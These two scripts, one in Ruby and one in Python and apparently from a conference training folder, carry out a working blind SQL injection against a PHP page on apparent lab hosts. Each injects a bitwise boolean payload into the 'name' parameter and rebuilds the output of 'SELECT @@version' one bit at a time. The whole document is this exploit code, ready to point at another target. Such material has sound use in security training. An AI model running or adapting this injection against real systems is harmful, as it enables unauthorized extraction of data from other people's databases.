File: ruxcon/blind-sqli.rb
require 'pp'

require "net/http"
require "uri"

url = URI.parse("http://web0.training/blind-sqli.php")


sql = "SELECT+@@version"
i = 0
str=""
while i<30
  c= 0
  0.upto(6) do |j|
    inj = "'%20and%20ascii(substring((#{sql}),#{i},1))%26#{(2**j).to_s}%3d#{(2**j).to_s}"
    req =  url.request_uri+"?name=admin"+inj+"%20--%20"
  
    resp = Net::HTTP.start(url.host, url.port) do |http|
     puts req
     http.get(req,{})
          
    end
    if resp.body =~ /^OK$/ 
      puts "ok"
      c+= 2**j
    end
    puts resp.body
  end
  str+= c.chr
#  if c==0 
#    puts str
#    exit
#  end
  i+=1
end
puts str

File: ruxcon/blind-sqli.py
import httplib
import re

server = "10.10.220.221:8000"
path = "/blind-sqli.php"
sql = "SELECT+@@version"
string = ""
for i in range(30):
	c = 0#lol
	for j in range(7):
		inj = '\'%20and%20ascii(substring((' + sql + '),' + str(i) + ',1))%26' + str(2**j) + '%3d' + str(2**j)
		req = path + '?name=admin' + inj + '%20--%20'
		print req
		conn = httplib.HTTPConnection(server)
		conn.request("GET", req, "")
		status = conn.getresponse()
		response_body = status.read()

		if re.match('OK$', response_body, re.MULTILINE):
			print 'ok'
			c += 2**j
			
		print response_body
	string += chr(c)

print string

		
